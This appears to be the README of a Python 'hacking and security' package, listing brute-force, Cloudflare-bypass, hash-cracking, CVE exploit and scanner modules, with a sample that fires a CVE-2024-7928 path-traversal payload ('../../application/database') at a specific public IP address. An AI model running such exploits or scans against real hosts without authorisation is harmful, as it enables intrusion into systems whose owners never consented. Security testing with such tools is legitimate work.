Aiming to become the best package available for hacking and security in Python.
- Author : Ahur4
pip install unsafe
- BruteForce
- Admin Finder
- FileManager Finder
- Cloudflare Bypasser
- Wordpress Plugin Finder
- Cryptography
- Decrypt
- Encrypt
- Hash
- Crack Hash
- Exploits
- CVE-2021-42013
- CVE-2024-7313
- CVE-2024-7339
- CVE-2024-7928
- Add more in the future.
- Forensic
- Image Metadata
- PDF Metadata
- Audio Metadata
- Network
- MacAddress Lookup
- Proxy Tester
- Port Scanner
- Proxy Extractor
- Web
- Search Engine ( For GoogleDorking )
- Crawler
- Xss Scanner
- SQL Injection Scanner
Exploit Sample
from unsafe import exploits
penetration_tester = exploits.CVE_2024_7928(
url="http://47.105.229.158:9001",
path="/index/ajax/lang",
key="lang",
value="../../application/database",
)
result = penetration_tester.check_vuln()
if result is not None:
print("Target is vulnerable !")
print("\n".join([f"{k} : {v}" for k, v in result.items()]))
else:
print("Target is not vulnerable !")
Mac Address lookup/Port scanner
from unsafe import network
# macaddress lookup
mac_address = "00:00:5e:00:53:af"
lookup = network.mac_address_lookup(mac=mac_address)
print(lookup)
# port scanning
ports = [80, 443, 21, 27017, 9002]
ip = "127.0.0.1"
open_ports = network.port_scanner(host=ip, ports=ports)
print(open_ports)